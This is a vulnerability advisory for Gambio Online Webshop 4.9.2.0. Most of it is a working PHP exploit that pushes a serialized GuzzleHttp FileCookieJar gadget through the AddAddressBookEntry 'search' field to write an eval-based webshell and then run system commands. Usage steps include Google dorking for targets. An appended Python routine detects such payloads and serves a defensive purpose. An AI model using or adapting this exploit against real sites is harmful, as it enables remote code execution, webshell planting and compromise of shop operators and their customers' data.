
Gambio Online Webshop 4.9.2.0 Code Injection

Gambio Online Webshop version 4.9.2.0 suffers from a PHP code injection vulnerability.

Packet Storm
=============================================================================================================================================
| # Title     : Gambio Online Webshop 4.9.2.0 Code Injection Vulnerability
| # Author    : indoushka
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)
| # Vendor    : https://www.gambio.com/
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.
[+] Uses cURL to allow remote commands.
[+] Line 85: set your target.
[+] Save the code as poc.php.
[+] Usage : cmd => c:\www\test\php poc.php
[+] Payload :

<?php
class GambioExploit {
    private $targetUrl;
    private $webshellName;
    private $postParam;
    private $getParam;
    private $phpCmdFunction;

    public function __construct($targetUrl, $phpCmdFunction = 'passthru', $webshellName = null) {
        $this->targetUrl = $targetUrl;
        $this->phpCmdFunction = $phpCmdFunction;
        $this->webshellName = $webshellName ?: $this->randomString() . '.php';
        $this->postParam = $this->randomString();
        $this->getParam = $this->randomString();
    }

    // Random string generator
    private function randomString($length = 8) {
        return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length);
    }

    // Function to send HTTP POST request
    private function sendPostRequest($uri, $data) {
        $url = $this->targetUrl . $uri;
        $options = [
            'http' => [
                'header' => "Content-type: application/x-www-form-urlencoded\r\n",
                'method' => 'POST',
                'content' => http_build_query($data),
            ],
        ];
        $context = stream_context_create($options);
        return file_get_contents($url, false, $context);
    }

    // Upload webshell to target
    public function uploadWebshell() {
        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";
        $finalPayload = base64_encode(serialize([
            "GuzzleHttp\\Cookie\\FileCookieJar" => [
                "cookies" => [
                    "GuzzleHttp\\Cookie\\SetCookie" => [
                        "data" => [
                            "Value" => $phpPayload,
                            "Domain" => "target.com",
                            "Path" => "/",
                        ]
                    ]
                ],
                "filename" => $this->webshellName
            ]
        ]));
        $this->sendPostRequest('/shop.php?do=Parcelshopfinder/AddAddressBookEntry', [
            'checkout_started' => 0,
            'search' => $finalPayload,
            'firstname' => 'test',
            'lastname' => 'test',
        ]);
        echo "Webshell uploaded to: {$this->webshellName}\n";
    }

    // Execute PHP payload
    public function executePhp($cmd) {
        $payload = base64_encode($cmd);
        $this->sendPostRequest("/{$this->webshellName}", [
            $this->postParam => $payload
        ]);
        echo "Executed command via webshell: {$cmd}\n";
    }

    // Execute command
    public function executeCommand($cmd) {
        $payload = base64_encode($cmd);
        $this->sendPostRequest("/{$this->webshellName}?{$this->getParam}={$this->phpCmdFunction}", [
            $this->postParam => $payload
        ]);
        echo "Executed command: {$cmd}\n";
    }
}

// Example Usage
$exploit = new GambioExploit('https://target.com');
$exploit->uploadWebshell();
$exploit->executeCommand('id');

Greetings to :
=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)
=====================================================================================
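The PoC above delivers its serialized payload through the `search` field of the Parcelshopfinder/AddAddressBookEntry action. The following detection routine is added here as an example and is not part of the original advisory or of Gambio's code: it flags requests to that action whose `search` value base64-decodes to PHP-serialized data or embedded PHP source. The request records and the serialized sample are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import unquote_plus

# Endpoint and gadget class name as they appear in the PoC above.
TARGET_PATH = "/shop.php"
TARGET_ACTION = "Parcelshopfinder/AddAddressBookEntry"
MARKERS = (
    re.compile(rb"GuzzleHttp\\Cookie\\FileCookieJar"),  # gadget class used by the PoC
    re.compile(rb"<\?php"),                             # embedded PHP source
    re.compile(rb'O:\d+:"'),                            # any serialized PHP object
)

def decode_search(value: str) -> bytes:
    """URL-decode then base64-decode a `search` value; b"" if it is not base64."""
    try:
        return base64.b64decode(unquote_plus(value), validate=True)
    except (binascii.Error, ValueError):
        return b""

def is_suspicious_search(value: str) -> bool:
    """True when the decoded value carries a serialized-object or PHP payload."""
    decoded = decode_search(value)
    return any(m.search(decoded) for m in MARKERS)

def scan_requests(requests: list[dict]) -> list[dict]:
    """Return requests to the AddAddressBookEntry action with a suspicious `search`."""
    return [
        req for req in requests
        if req["path"] == TARGET_PATH
        and req["query"].get("do") == TARGET_ACTION
        and is_suspicious_search(req["form"].get("search", ""))
    ]

# Constructed sample traffic: one legitimate lookup and one request whose
# `search` field is base64 of a PHP-serialized array naming the gadget class.
_SERIALIZED = b'a:1:{s:31:"GuzzleHttp\\Cookie\\FileCookieJar";a:1:{s:8:"filename";s:5:"x.php";}}'
SAMPLE_REQUESTS = [
    {"src": "10.0.0.5", "path": "/shop.php",
     "query": {"do": "Parcelshopfinder/AddAddressBookEntry"},
     "form": {"search": "Berlin Mitte", "firstname": "Anna"}},
    {"src": "10.0.0.9", "path": "/shop.php",
     "query": {"do": "Parcelshopfinder/AddAddressBookEntry"},
     "form": {"search": base64.b64encode(_SERIALIZED).decode(), "firstname": "test"}},
]

if __name__ == "__main__":
    for hit in scan_requests(SAMPLE_REQUESTS):
        print(f"ALERT src={hit['src']}: serialized payload in search parameter")
```

A WAF rule or log pipeline can apply the same check to the decoded `search` field; a plain-text city or postcode search never base64-decodes to a serialized PHP object.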
